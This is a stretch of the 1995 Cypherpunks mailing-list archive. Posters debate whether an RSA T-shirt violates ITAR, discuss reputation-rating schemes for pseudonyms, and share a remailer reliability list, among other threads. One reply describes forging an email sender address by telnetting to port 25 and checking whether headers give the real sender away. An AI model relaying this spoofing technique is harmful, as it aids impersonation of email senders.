|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
| ``Officer, officer, arrest that man!  He's whistling a dirty song.''      |
+----------------------------------------------------------- Jean Ellison -+

From futplex at pseudonym.com Sun Sep 3 21:43:14 1995
From: futplex at pseudonym.com (Futplex)
Date: Sun, 3 Sep 95 21:43:14 PDT
Subject: Wearing RSA shirt to school
In-Reply-To: <199509040130.VAA35298@tequesta.gate.net>
Message-ID: <9509040443.AA00884@cs.umass.edu>

I wrote:
> With respect to possession within the U.S., there aren't any
> laws stopping you from waving strong cryptography around wherever you like
> (at least, not yet).

----
...and in private email, Jim Ray pointed out that showing the shirt to a foreign national might technically violate ITAR...
----

Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then flashing it at a furriner could constitute a violation. Thanks for the correction.

The gist of my previous message remains: No local or state authority in the U.S.
(of which I'm aware) classifies strong cryptography as a munition, weapon, etc. I haven't heard of any restrictions on transporting crypto across state lines, either. Unless the Feds start cracking down on high schools, or the Perl-RSA shirt somehow violates some school dress code, (gang colors ? ;) the original questioner need not fret about his son wearing the shirt to school.

-Futplex, just another slimy tentacle of the List Maintainer

From hfinney at shell.portal.com Sun Sep 3 21:52:26 1995
From: hfinney at shell.portal.com (Hal)
Date: Sun, 3 Sep 95 21:52:26 PDT
Subject: pseudonyms & list health
Message-ID: <199509040451.VAA23173@jobe.shell.portal.com>

From: "Vladimir Z. Nuri"
> hence, what I am suggesting is that one
> of the "stable attractors" that TM is always talking about
> may be a reality in which people pool most of their accomplishments
> under a single nym. furthermore, they will wish to avoid conflict
> with other nyms in respect to attribution.
> isn't this, functionally, the equivalent of the supposed
> anti-cypherpunk "true names"?

An interesting point. I have long wished that there would be a form of "credential certificates" which people could give as special signatures on other people's public keys. Then using Chaumian credential technology it would be possible to anonymously transfer these credentials from one pseudonym to another.

This is not a perfect solution, of course. Much reputation is informal and simply resides in the opinions held in people's minds. But perhaps if a more structured solution like this became widespread it would help to prevent the "concentration of reputation" which Vlad describes.

Along with the usual flames, I occasionally get messages saying nice things about postings I have made, and I sometimes save these in a file called "praise". Here are some excerpts:

> Again, thanks for posting some useful information that
> actually has *direct relevance to crypto*.

> I really enjoyed reading this.
> It was well written and comprehensive.
> Thanks for sharing it.

> Nice post!

I certainly appreciate these kinds of comments, but it would be even more useful if such messages were expressed as the kinds of certificates I am describing. I wonder whether people would be willing to use a program which would let them issue such "reputation signatures" of various kinds, and display the signatures which were present on keys.

Discussion of such schemes has often bogged down in considering the various categories or types of credentials people might want to give. This is somewhat analogous to the "rate-the-net" schemes we have talked about where a similar issue arises if we try to mark pages with a whole range of characteristics so people can judge whether they should let their kids read them. Perhaps the solution needs to be found in simplicity. SurfWatch (as I understand it) gives a simple "thumbs down" to selected web pages. Maybe a simple "endorsement" would be useful as a reputation credential without trying to identify exactly what it is about the person you are endorsing.

I could see such a system initially being piggybacked on PGP keys (the signatures would not be understandable by PGP though), although for Chaumian credential transfers the keys have to be specially structured and that would require a new approach.

Who would be willing and/or interested enough to use such a system if it existed?
Hal

From rrothenb at ic.sunysb.edu Sun Sep 3 21:54:45 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Sun, 3 Sep 95 21:54:45 PDT
Subject: Oddly enough, Clipper is helpful
Message-ID: <199509040454.AAA05091@csws5.ic.sunysb.edu>

Despite a few rants about how the NSA has monkeywrenched potential standards for encryption with Clipper (market forces being what they are, even if there were no Clipper we may still have no standard by now...), I think there is oddly a good side to Clipper: the issue has thrown cryptography and security into the public debate, even if marginally. Prior to Clipper, PGP was not featured in national and international features on TV, newspapers and magazines... now a lot of people want their hands on it. People have become aware of communications security issues--very average folks who one might even consider techno-illiterates or luddites are now concerned with the government's ability to listen in and watch them.

Think of Clipper as an opportunity to propose something better, as an opportunity to make people more aware of the issue.

From tcmay at got.net Sun Sep 3 21:56:43 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 3 Sep 95 21:56:43 PDT
Subject: Clinton's Black Helicopters Over My House!
Message-ID:

ObConspiracy content: high.

They are coming to take me away, take me away! Clinton's black helicopters are swooping low over my house. What should I do?

Yes, this has nothing to do with coding in C, or even coding in Java, but it's too good a story not to share with you.

My hilltop house, in the Santa Cruz mountains, lies directly between Monterey and San Jose. His Excellency is landing tonight in Monterey--probably has just done so, judging by the sudden increase in air traffic--to dedicate tomorrow a "defense conversion" of the former Fort Ord to "Cal State Monterey Bay," a new state college.
(In California there are three tiers of colleges: the 9 campuses of the University of California system (Berkeley, UCLA, UCSC, UCSB, UCSD, etc.), the twenty-some "Cal State" schools, and some ungodly number of Community Colleges.)

Anyway, lots of choppers flying directly over my house, at fairly low altitude. Maybe I could spell out a Cypherpunks message in white stones in my driveway, or maybe just a rose? He'll be choppering from Monterey to Alameda tomorrow, after lunch, so I need to think of something to prepare for him.

I'm tempted to try to take a photo with my telescope, but the choppers flying with him might think I had a Redeye or Stinger or something from the weapon shops of Isher, and send me back at least a visit by the Praetorians, so I'll avoid "looking dangerous" in my back yard as the choppers pass overhead.

(I find it hard to believe what the scribblers are saying, that this is the first visit by a sitting President to Monterey in 100 years. What with Carmel and Big Sur nearby, kind of hard to believe, eh?)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From rrothenb at ic.sunysb.edu Sun Sep 3 22:06:16 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Sun, 3 Sep 95 22:06:16 PDT
Subject: pseudonyms & list health
In-Reply-To: <199509040451.VAA23173@jobe.shell.portal.com>
Message-ID: <199509040505.BAA05115@csws5.ic.sunysb.edu>

*My* willingness to use such a system would depend on the system. Of course, if you create such a system there will be somebody who uses it... how well and in what circumstances, and how many people, use it, is another matter.
My worry is about abuse. One would prefer to save endorsements and find a way to remove thumbs-downs... also how to prevent one from overdoing a thumbs-up or -down certification for a person (either to inflate or deflate a reputation). In terms of persons, I see this more as an electronic equivalent of medal awards, or those nifty little smiley stickers my second grade teacher used to give. After a while they become meaningless.

Systems to rate web-sites, newsgroups, etc. in terms of specific qualities (sexual content, religious sentiment, useful information, technical/skill level of material, size of posts/files, etc.) that showed the given ratings of various organizations or people who were certified to rate on that system would be good... if implemented properly.

From tcmay at got.net Sun Sep 3 22:07:51 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 3 Sep 95 22:07:51 PDT
Subject: Wearing RSA shirt to school
Message-ID:

Grumpiness warning: I have held my tongue the past few months as all of these "this t-shirt has been declared a munition!!!" messages went out, but I can hold my tongue no longer.

At 4:43 AM 9/4/95, Futplex wrote:
>I wrote:
>> With respect to possession within the U.S., there aren't any
>> laws stopping you from waving strong cryptography around wherever you like
>> (at least, not yet).
>
>----
>...and in private email, Jim Ray pointed out that showing the shirt to a
>foreign national might technically violate ITAR...

Nope, no more so than letting a foreign national read Schneier's book is a violation of the ITAR. If you dispute this, ask whether Schneier's book is banned from export (the book, not the optional diskette). It isn't. Nor are other cryptography _books_ banned from export.

I'm not minimizing the issue of export of machine-readable code, as in diskettes.
But to claim that a blurry, printed on cotton "barcode" is even remotely in the same class as exporting a workable set of cryptographic system routines, or that letting a furriner merely "gaze upon" this blurry barcode, is a violation of the ITARs is laughable.

>Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover
>the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then
>flashing it at a furriner could constitute a violation. Thanks for the
>correction.

No. No more so than "flashing" a copy of a crypto book would constitute a violation.

>
>The gist of my previous message remains: No local or state authority in the
>U.S. (of which I'm aware) classifies strong cryptography as a munition,
>weapon, etc. I haven't heard of any restrictions on transporting crypto
>across state lines, either. Unless the Feds start cracking down on high
>schools, or the Perl-RSA shirt somehow violates some school dress code, (gang
>colors ? ;) the original questioner need not fret about his son wearing the
>shirt to school.

It was this series of posts about whether wearing the "munitions t-shirt" near schools was a crime or not that made me think the silly season had arrived. If the t-shirt is a munition, and books are munitions, then libraries must be real "ammunition dumps," ready to explode at any minute. News at 11.

Let's get real.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From ethridge at Onramp.NET Sun Sep 3 22:12:51 1995
From: ethridge at Onramp.NET (Allen B.
Ethridge) Date: Sun, 3 Sep 95 22:12:51 PDT Subject: ASN.1 and Kerberos version 5 Message-ID: >I don't think that the concept of ASN.1 is as bad as Jeff makes out. If it >worked >then ASN.1 would be very very usefull. But is just plain don't. > >ASN.1 is worse than useless, it means that a very good idea is rendered >unusable >because of a baddly botched implementation. > I'm not familiar with ASN.1 except for the occasional short piece in various books. But i was under the impression that it was similar to the language used to define TCAP and ROSE standards. These standards are reasonably well defined. I've gotten to the point where i get annoyed when working with protocols that treat everything like abitrarily organized bits and bytes (like NA Cellular protocols and PGP). So, would use of the language used to define TCAP and ROSE applications be a possibility? I've occasionally thought about developing such a protocol for PGP. allen From tcmay at got.net Sun Sep 3 22:58:32 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 3 Sep 95 22:58:32 PDT Subject: Reputations and Reading Preferences Message-ID: (This post has a second part, "Using Web Sites to Get Distributed Ratings," which you might want to read even if the first part looks uninteresting.} Hal has some interesting comments, as usual, about how positive feedback about authors can be integrated into mail readers and news readers. (Or at least I took Hal's post as a jumping off point to think about these issues--again.) I've given this some thought recently, but have reached no firm conclusions, except: it's probably not needed by most of us. That is, I have little interest in what others think. If the herd votes that "America's Funniest Home Videos" is their favorite program, or that Jackie Collins is their favorite author, who cares? At least I don't. I don't read stuff on the basis of a "beauty contest." I suspect the same is true of many others. 
But Hal was perhaps thinking in terms of the more sophisticated approach of creating scoring systems in which a matrix R[u,v] is created, where each element corresponds to the rating of u given by v. On the Cypherpunks list, for example, with more than 500 subscribers, each of the 500 might have a rating of perhaps 100 of the active posters, maybe only the 20 or 30 most active and memorable posters. (That is, many of you 500 readers would not have a meaningful entry, just because you have posted so little.)

And more sophisticated models take into account one's reputation given to the views expressed by others. That is, some of those R[u,v] are discounted, some are held in high esteem. This results in a further weighting of the reputations. As an example, Madonna gives a good rating (0.8) to Da Dogg Pound, but I dislike Madonna and her taste, so I weight her rating accordingly.

And one can imagine scoring systems in which cumulative ratings are considered. E.g., a lot of people whom I respect like the works of Thomas Pynchon, so I'll give him a try. (I use a simple scoring system in YA-Newswatcher, though it needs more work, IMO.)

Things rapidly spin out of control, in terms of the communication needed, the difficulty of getting participation (like a lot of polls, the most thoughtful often are the least likely to respond), and so on.

A few years ago on the Extropians list this was a hot topic, and various "rating systems" were proposed. I recall a particularly complex scheme by Alexander Chislenko which purported to solve this problem...unfortunately, it still looked to me to have the essential characteristics of a beauty contest.

Fortunately, I can't see the need. Why not? And what's the better alternative?

Here's a recipe which seems to work pretty well, and not just for me:

* Apply filters based on one's own likes and dislikes. Killfile some posters, skip some threads, etc.
* Periodically get inputs from others that one respects, a la book recommendations, movie reviews, etc.

This effectively generates what the mass rating scheme would generate, albeit not identically (how could it?). One's favorite posters get read, and one's favorite posters can make some recommendations of other authors one should look at. Informal, but with many emergent advantages.

Using Web Sites to Get Distributed Ratings

Concretely, one way to do this is for people to do what Eric Blossom is doing with his "Cypherpunks Lite" mailing list. Or with the Web archives that Todd Masco has been running, and that Jay Campbell just started.

Imagine: Rudy the Rater sets up a mail-to-Web-site archive, using whatever these folks above are using. Except, he screens the stuff to separate the bad from the good, using whatever criterion he thinks is right. People either use his site, or don't. (A Web site has some logistical advantages over subscribing to various mailing lists which do the same filtering.)

Other services emerge with differing rating criteria, different aesthetic standards of goodness, or even different interests. (Some sites could filter out all of the political posts, others could filter out all the programming posts, etc.)

Readers could pick the sites they wish to read, and simultaneously be exposed to authors they might have otherwise overlooked. The authors they like, and the filtering of the site operator, create a "clique" (as in math terminology) that effectively is similar to the vector weighting scheme present in the R[u,v] scheme.

An advantage of the distributed site model over the R[u,v] model is the lack of any central coordination, the market anarchy of the process.

Shared kill files are another possibility. As kill files become more commonly used, they may be traded around, weighted in the same way as described above.
Again, I claim that an adequate and workable solution is not to solve the more general problem of everybody rating everyone else, but just of having access to a limited number of killfiles from people one respects.

These approaches are doable today. Especially the distributed Web competing "best of" sites. I may do one myself! (If Jay Campbell lets me have Web stuff on his system.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From suedeenim at censored.org Sun Sep 3 23:06:28 1995
From: suedeenim at censored.org (Sue Deenim)
Date: Sun, 3 Sep 95 23:06:28 PDT
Subject: pseudonyms & list health
Message-ID: <199509040606.XAA29059@mailhost.primenet.com>

Is this what you're looking for?

Love Always,
Sue Deenim

>but what if these people had just stopped subscribing under
>their clear name? and started using a pseudonym?
>
>well, just some musings for those who unabashedly promote pseudonyms
>to contemplate.
>
>--Vlad Nuri
>
>

--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8)   carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
http://dcs.ex.ac.uk/~aba/export/

From pfarrell at netcom.com Sun Sep 3 23:11:39 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Sun, 3 Sep 95 23:11:39 PDT
Subject: Cyphernomicon, and a section on Escrow and Reputations
Message-ID: <50697.pfarrell@netcom.com>

> I know of a couple of alternative places.

I too got tired of Netcom's anon ftp server. An unaltered, ASCII copy of Tim's CP-FAQ is available as
http://www.isse.gmu.edu/~pfarrell/crypto/CP-FAQ
This is a low usage site, so response should be fine.

BTW, there is a page for the DC-area Cypherpunks as
http://www.isse.gmu.edu/~pfarrell/dccp/index.html

And a guide to every US Government WWW page that I could find (including locations of spook facilities) starting at
http://www.isse.gmu.edu/~pfarrell/government/usgov.html

Other crypto related resources are available starting at
http://www.isse.gmu.edu/~pfarrell/crypto.html

Pat

Pat Farrell      Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage        #include

From futplex at pseudonym.com Sun Sep 3 23:14:09 1995
From: futplex at pseudonym.com (Futplex)
Date: Sun, 3 Sep 95 23:14:09 PDT
Subject: pseudonyms & list health
In-Reply-To: <199509040505.BAA05115@csws5.ic.sunysb.edu>
Message-ID: <9509040614.AA01461@cs.umass.edu>

Deranged Mutant writes:
> My worry is about abuse. One would prefer to save endorsements and find
> a way to remove thumbs-downs...
> also how to prevent one from overdoing a
> thumbs-up or -down certification for a person (either to inflate or deflate
> a reputation).

A few nuisance lawsuits from people who were given thumbs-downs might do the trick, as with employment recommendations in the U.S. :[

> In terms of persons, I see this more as an electronic equivalent of medals
> awards, or those nifty little smiley stickers my second grade teacher used
> to give. After a while they become meaningless.

ObTim: As in other reputation markets, some people will spread their blessings more liberally than others. They do this at the risk of diluting the worth of each credential granted. It all comes out in the wash.

A reviewer named Susan Granger, for example, is known to me as a person who routinely lauds lousy movies. Thus it's simple for me to ignore her positive recommendations (I've yet to see a negative review from her). In fact, when I observe that a new film prominently features her seal of approval in its advertising, I take that fact as an indication of the lack of praise from more discriminating reviewers. So a nominal "positive" credential may be interpreted as an implicit negative credential, depending upon context.

OTOH, if I only give digital thumbs-up to a couple of people on the list, those who consider me a reputable appraiser-of-cpunks should find the information relatively useful. I'm sure I can manage to be a harsher critic than your 2nd-grade teacher :}

Using e.g. a single 1-10 scale would be highly practical for such purposes, IMHO.

-Futplex

From starrd at starrd Sun Sep 3 23:19:40 1995
From: starrd at starrd (starrd@iia2.org)
Date: Sun, 3 Sep 95 23:19:40 PDT
Subject: Direct Socket to Remailer?
In-Reply-To:
Message-ID:

On Fri, 1 Sep 1995, Lance Cottrell wrote:

> You should try the telnet port 25 trick. It is amazingly simple (but not
> secure). Just "telnet some.machine.com 25" and type help. It will guide you
> through it. It is quite informative.
Be sure to test it first, sometimes it records who *really* sent it as well as the "forged" return address. Test it by mailing to yourself and then look at all the headers.

||||||||||||email address: starrd at iia2.org or starrd at cinenet.net|||||||||||
| Creator of the original                          | Get paid to upload     |
| Patriot's Archives                               \ shareware to BBSes and |
| ftp: iia.org /pub/users/patriot                   \_____ the Internet!    |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file:            |
| For index of available files: descript.ion          \ uploader.zip        |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

From starrd at starrd Mon Sep 4 00:00:47 1995
From: starrd at starrd (starrd@iia2.org)
Date: Mon, 4 Sep 95 00:00:47 PDT
Subject: Clinton's Black Helicopters Over My House!
In-Reply-To:
Message-ID:

On Sun, 3 Sep 1995, Timothy C. May wrote:

> My hilltop house, in the Santa Cruz mountains, lies directly between
> Monterey and San Jose. His Excellency is landing tonight in
> Monterey--probably has just done so...

> (I find it hard to believe what the scribblers are saying, that this is the
> first visit by a sitting President to Monterey in 100 years. What with
> Carmel and Big Sur nearby, kind of hard to believe, eh?)

Oh shit! There goes the neighborhood!
From liberty at gate.net Mon Sep 4 05:33:18 1995
From: liberty at gate.net (Jim Ray)
Date: Mon, 4 Sep 95 05:33:18 PDT
Subject: Wearing RSA shirt to school
Message-ID: <199509041203.IAA38469@tequesta.gate.net>

Tim wrote:
>At 4:43 AM 9/4/95, Futplex wrote:
>>I wrote:
>>> With respect to possession within the U.S., there aren't any
>>> laws stopping you from waving strong cryptography around wherever you like
>>> (at least, not yet).
>>
>>----
>>...and in private email, Jim Ray pointed out that showing the shirt to a
>>foreign national might technically violate ITAR...
>
>Nope, no more so than letting a foreign national read Schneier's book is a
>violation of the ITAR. If you dispute this, ask whether Schneier's book is
>banned from export (the book, not the optional diskette). It isn't. Nor are
>other cryptography _books_ banned from export.

The law doesn't have to be consistent, or to make sense, or be enforced evenhandedly.
The law is, after all, not written, or interpreted, or enforced, by partisan Libertarians like me. My private email to Futplex said *may* violate... and I stand by it. [IANAL, though.] Whether or not a law as incontrovertibly stupid as ITAR is enforced may depend on the timing of the next election, as we seem to be witnessing in the limbo-state of PRZ.

>I'm not minimizing the issue of export of machine-readable code, as in
>diskettes. But to claim that a blurry, printed on cotton "barcode" is even
>remotely in the same class as exporting a workable set of cryptographic
>system routines, or that letting a furriner merely "gaze upon" this blurry
>barcode, is a violation of the ITARs is laughable.

Yes, but *many* laws are laughable.

>>Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover
>>the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then
>>flashing it at a furriner could constitute a violation. Thanks for the
>>correction.

Actually, it was less a correction than me pointing out (yet another) note of uncertainty. James Madison, in Federalist #62 said it best:

"What indeed are all the repealing, explaining, and amending laws, which fill and disgrace our voluminous codes, but so many monuments of deficient wisdom."

Now, many of us would be more than satisfied to get back to that level of government. I suggest that everyone go have a look at the entire Code of Federal Regulations, before the next election.

>>the original questioner need not fret about his son wearing the
>>shirt to school.

I agree that wearing it through Customs on the way to Jamaica would be more problematic, but I live next to a US Customs agent, and he learned about ITAR from me. Here in Miami, Customs has plenty to think about with the various (occasionally venomous) inbound cargo.

>It was this series of posts about whether wearing the "munitions t-shirt"
>near schools was a crime or not that made me think the silly season had
>arrived.
It has, a long time ago. Ever watch C-SPAN?

JMR

Regards, Jim Ray

See, when the GOVERNMENT spends money, it creates jobs; whereas when the money is left in the hands of TAXPAYERS, God only knows what they do with it. Bake it into pies, probably. Anything to avoid creating jobs. -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35                                          James M. Ray
------------------------------------------------------------------------
Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________

From jya at pipeline.com Mon Sep 4 05:47:45 1995
From: jya at pipeline.com (John Young)
Date: Mon, 4 Sep 95 05:47:45 PDT
Subject: MAN_iax
Message-ID: <199509041247.IAA05904@pipe4.nyc.pipeline.com>

9-4-95. NYPaper:

"Computers Beware! New Type of Virus Is Loose on the Net."

   A new and deceptively simple type of computer virus, one that can sneak past security devices by hitching rides on electronic mail and other common Internet files, is causing deep concern among computer security officials around the world.

   Mr. Schmidt of Sun says, "There are criminals in the world and some of them are programmers. With computer networks, they have an amplifying effect that they've never had before. If I were a criminal with a gun, I might attack one person. But with a computer network, I can attack a million people at a time. It's like an atomic bomb."

   To avert a potential disaster, Mr. Schmidt has enlisted three of the world's top computer security experts, including Tsutomu Shimomura, Dan Farmer and Whitfield Diffie.

"Cybervirus Whodunit: Who Creates This Stuff?"

   Ms. Gordon conducted detailed interviews, by electronic mail, Internet chat, telephone and in person, with more than 60 virus writers. "The virus writer has been characterized by some as a bad, evil, depraved, maniac, terrorist, technopathic, genius gone mad, sociopath." This, she said, "is a gross oversimplification of the situation."

"Dick Tracy, Eat Your Heart Out."

   Move over, Captain Midnight. Heads up, Mata Hari. Now anyone can have a real-life decoder ring. The ring has a computer chip encoded with an identification number that gives the wearer access to secret computer files or locked rooms. The chip transmits your secret ID number or data at the space-age speed of 16,000 bits a second.

Triplets: MAN_iax

From rsalz at osf.org Mon Sep 4 06:08:36 1995
From: rsalz at osf.org (Rich Salz)
Date: Mon, 4 Sep 95 06:08:36 PDT
Subject: Wearing RSA shirt to school
Message-ID: <9509041307.AA20870@sulphur.osf.org>

>Let's get real.

Yes, please.

The head of Sun's network security group is a foreign national. They're doing DES and public key work. :)

From raph at CS.Berkeley.EDU Mon Sep 4 06:52:07 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 4 Sep 95 06:52:07 PDT
Subject: List of reliable remailers
Message-ID: <199509041351.GAA20450@kiwi.cs.berkeley.edu>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.
To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.taylored.com

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"avox"} = " cpunk pgp post";
$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub reord";
$remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = " cpunk pgp hash filter";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = " cpunk pgp hash cut reord mix post";
$remailer{"ford"} = " cpunk pgp";
$remailer{"hroller"} = " cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = " cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = " cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = " cpunk hash mix";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = " cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = " mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = " cpunk";

catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too.
Last ping: Mon 4 Sep 95 4:00:26 PDT

remailer  email address                          history       latency  uptime
-----------------------------------------------------------------------
alumni    hal at alumni.caltech.edu               ***+****--**    12:42  99.99%
hacktic   remailer at utopia.hacktic.nl           ************    11:36  99.99%
hroller   hroller at c2.org                       --**********     9:55  99.99%
c2        remail at c2.org                        --++++++++++    45:17  99.99%
mix       mixmaster at remail.obscura.com         .---------+-  2:49:48  99.99%
flame     remailer at flame.alias.net             +++++-++++++    44:09  99.99%
spook     remailer at spook.alias.net             -+-------.-   2:58:30  99.99%
syrinx    syrinx at c2.org                        -----------   1:42:59  99.99%
bsu-cs    nowhere at bsu-cs.bsu.edu               ***++*****-*    23:51  99.96%
rmadillo  remailer at armadillo.com               ++++*+*++ +   1:04:53  99.93%
replay    remailer at replay.com                  _***+*******    17:24  99.86%
ideath    remailer at ideath.goldenbear.com       ----- -----   5:13:51  99.60%
ncognito  ncognito at gate.net                    #+**-** **       6:07  98.99%
portal    hfinney at shell.portal.com             ***+** ****      5:08  98.91%
ford      remailer at bi-node.zerberus.de         ***********      5:15  97.26%
extropia  remail at extropia.wimsey.com           .-.._._ ---  16:38:13  95.81%
crown     mixmaster at kether.alias.net           --- ----- -   4:03:05  95.06%
vishnu    mixmaster at vishnu.alias.net           -----. ---    6:20:56  90.88%
robo      robo at c2.org                          -**********     17:00  90.58%
rahul     homer at rahul.net                      ******++*+**     7:45  99.99%
penet     anon at anon.penet.fi                   ---++++-- **  3:02:16  87.70%
gondolin  mixmaster at gondolin.org               ---- .        5:35:11  77.43%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

History key
    * # response in less than 5 minutes.
    * * response in less than 1 hour.
    * + response in less than 4 hours.
    * - response in less than 24 hours.
    * . response in more than 1 day.
    * _ response came back too late (more than 2 days).

cpunk    A major class of remailers. Supports Request-Remailing-To: field.
eric     A variant of the cpunk style. Uses Anon-Send-To: instead.
penet    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp      Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
hash     Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub     Remailer always kills subject header, even in non-pgp mode.
nsub     Remailer always preserves subject header, even in pgp mode.
latent   Supports Matt Ghio's Latent-Time: option.
cut      Supports Matt Ghio's Cutmarks: option.
post     Post to Usenet using Post-To: or Anon-Post-To: header.
ek       Encrypt responses in reply blocks using Encrypt-Key: header.
special  Accepts only pgp encrypted messages.
mix      Can accept messages in Mixmaster format.
reord    Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself.
mon      Remailer has been known to monitor contents of private email.
filter   Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering.

Raph Levien

From perry at piermont.com Mon Sep 4 06:59:09 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 4 Sep 95 06:59:09 PDT
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To:
Message-ID: <199509041358.JAA03311@frankenstein.piermont.com>

I'm not sure I see the words "cryptography" or any related to them here. It might be an interesting topic, but it probably isn't cypherpunks material.

.pm

Alan Horowitz writes:
> "Just cough up the peace dividend".
>
> There is no peace dividend. There is a massive eco-spill of government
> debt; quite possibly larger than the GNP capacity of the American
> economy to repay anytime in the next century.
>
> The debt will be bankrupted, in some stealthy manner, hidden by masses of
> smoke and mirrors. Nothing new here - it's about the only thing that
> works.
> For the most recent examples, read up on FDR's confiscation of
> gold in (?) 1933. Or read the details of the currency changeover
> effected by the occupation authorities in Germany (1947 or 1948).
>
> Alan Horowitz
> alanh at infi.net
>
>

From perry at piermont.com Mon Sep 4 07:05:14 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 4 Sep 95 07:05:14 PDT
Subject: Clinton's Black Helicopters Over My House!
In-Reply-To:
Message-ID: <199509041405.KAA03334@frankenstein.piermont.com>

Timothy C. May writes:
> ObConspiracy content: high.
>
> They are coming to take me away, take me away!
>
> Clinton's black helicopters are swooping low over my house.
>
> What should I do?
>
> Yes, this has nothing to do with coding in C, or even coding in Java, but
> it's too good a story not to share with you.

Actually, it didn't seem like much of a story at all. The president's choppers flew over your place. Big deal. Can we get back to cryptography, please? Or do you want to hear about the time I urinated next to Paul Newman in the bathroom at the Tanglewood Music Festival?

.pm

PS Yes, I have no sense of humor. So sorry.

From perry at piermont.com Mon Sep 4 07:13:36 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 4 Sep 95 07:13:36 PDT
Subject: Wearing RSA shirt to school
In-Reply-To: <9509041307.AA20870@sulphur.osf.org>
Message-ID: <199509041413.KAA03364@frankenstein.piermont.com>

Rich Salz writes:
> >Let's get real.
>
> Yes, please.
>
> The head of Sun's network security group is a foreign national. They're
> doing DES and public key work. :)

Of course, under the law, foreign nationals are US Persons for purposes of the ITAR if they are permanent residents.

Perry

From frogfarm at yakko.cs.wmich.edu Mon Sep 4 07:26:44 1995
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Mon, 4 Sep 95 07:26:44 PDT
Subject: Wearing RSA shirt to school
